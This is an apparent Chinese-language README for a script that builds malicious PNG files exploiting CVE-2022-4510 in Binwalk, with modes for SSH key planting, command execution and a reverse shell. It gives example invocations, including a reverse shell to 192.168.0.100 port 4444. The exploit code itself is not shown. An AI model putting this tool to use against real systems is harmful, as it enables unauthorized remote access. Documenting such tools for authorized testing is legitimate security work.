此脚本允许您生成针对CVE-2022-4510 Binwalk漏洞的利用程序。这些利用程序可用于测试和演示。支持的选项包括SSH、命令执行和反弹Shell。
ssh:生成SSH利用程序。
file:输入.png文件的路径。pub:公钥文件的路径。command:生成执行命令的利用程序。
--command:要执行的命令。file:输入.png文件的路径。reverse:生成反弹Shell利用程序。
file:输入.png文件的路径。ip:监听器的IP地址。port:监听器的端口号。示例用法:
python exploit_generator.py ssh input.png public_key.pub
python exploit_generator.py command --command "ls -l" input.png
python exploit_generator.py reverse input.png 192.168.0.100 4444
生成的利用程序将保存为当前目录下的 binwalk_exploit.png。
请负责任地使用此脚本,仅用于您有权测试或演示漏洞的系统。作者不对任何非法或未经授权的使用行为承担责任。